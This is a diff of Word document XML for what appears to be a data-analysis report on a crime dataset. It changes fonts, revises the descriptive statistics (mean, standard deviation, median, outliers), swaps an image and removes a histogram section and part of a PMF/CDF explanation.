+                        <w:t>“.describe</w:t>
                       </w:r>
                       <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
-                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
+                          <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
-                        <w:t>()”</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t xml:space="preserve"> method, we can get some insights:</w:t>
+                        <w:t>()” method, we can get some insights:</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
                       <w:pPr>
                         <w:numPr>
                           <w:ilvl w:val="0"/>
-                          <w:numId w:val="16"/>
+                          <w:numId w:val="24"/>
                         </w:numPr>
+                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
                         <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
                           <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
                       </w:pPr>
                       <w:r>
                         <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
                           <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
-                        <w:t>There is a wide range of 'VALUE' in the dataset, with values ranging from 0 to 20,707.</w:t>
+                        <w:t>The average number of crimes in the dataset is 34.78.</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
                       <w:pPr>
                         <w:numPr>
                           <w:ilvl w:val="0"/>
-                          <w:numId w:val="16"/>
+                          <w:numId w:val="24"/>
                         </w:numPr>
+                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
                         <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
                           <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
                       </w:pPr>
                       <w:r>
                         <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
                           <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
-                        <w:t>The high standard deviation suggests that there is a significant dispersion of values</w:t>
-                      </w:r>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                          <w:lang w:eastAsia="en-IE"/>
-                        </w:rPr>
-                        <w:t>.</w:t>
+                        <w:t>The standard deviation is 143.66, which means that the number of crimes varies widely.</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
                       <w:pPr>
                         <w:numPr>
                           <w:ilvl w:val="0"/>
-                          <w:numId w:val="16"/>
+                          <w:numId w:val="24"/>
                         </w:numPr>
+                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
                         <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
                           <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
                       </w:pPr>
                       <w:r>
                         <w:rPr>
-                          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
                           <w:lang w:eastAsia="en-IE"/>
                         </w:rPr>
-                        <w:t>The median value of 109 indicates the central tendency, but the mean is higher at 1,560.19, suggesting potential skewness in the data.</w:t>
+                        <w:t>There are a few outliers in the dataset, with the maximum number of crimes being 6523.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:numPr>
+                          <w:ilvl w:val="0"/>
+                          <w:numId w:val="24"/>
+                        </w:numPr>
+                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+                        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+                          <w:sz w:val="21"/>
+                          <w:szCs w:val="21"/>
+                          <w:lang w:eastAsia="en-IE"/>
+                        </w:rPr>
+                        <w:t>The median number of crimes is 4, which means that half of the crimes in the dataset are less than or equal to 4, and half are greater than or equal to 4.</w:t>
                       </w:r>
                     </w:p>
                     <w:p/>
@@ -9480,11 +9796,17 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E8AAD24" wp14:editId="20697BEB">
-            <wp:extent cx="1909482" cy="1558552"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
-            <wp:docPr id="1229985409" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3766CC71" wp14:editId="673BF580">
+            <wp:extent cx="1808748" cy="1591945"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
+            <wp:docPr id="1981012682" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -9492,591 +9814,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1229985409" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="1929025" cy="1574504"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>it is useful f</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>or understanding the characteristics of your data</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449CA885" wp14:editId="5499C689">
-            <wp:extent cx="4060874" cy="2460625"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="44239508" name="Picture 1" descr="A screenshot of a graph&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="44239508" name="Picture 1" descr="A screenshot of a graph&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="4072269" cy="2467530"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t xml:space="preserve">Figure 05 – histogram of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>There are some insights that you can get from the bin plot:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc59959351"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>PFM and CDF</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pmf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cdf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="17"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A PMF is a function that gives the probability of each possible value of a discrete random variable.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="17"/>
-        </w:numPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t>A CDF is a function that gives the probability that a random variable will take on a value less than or equal to a given value.</w:t>
-      </w:r>
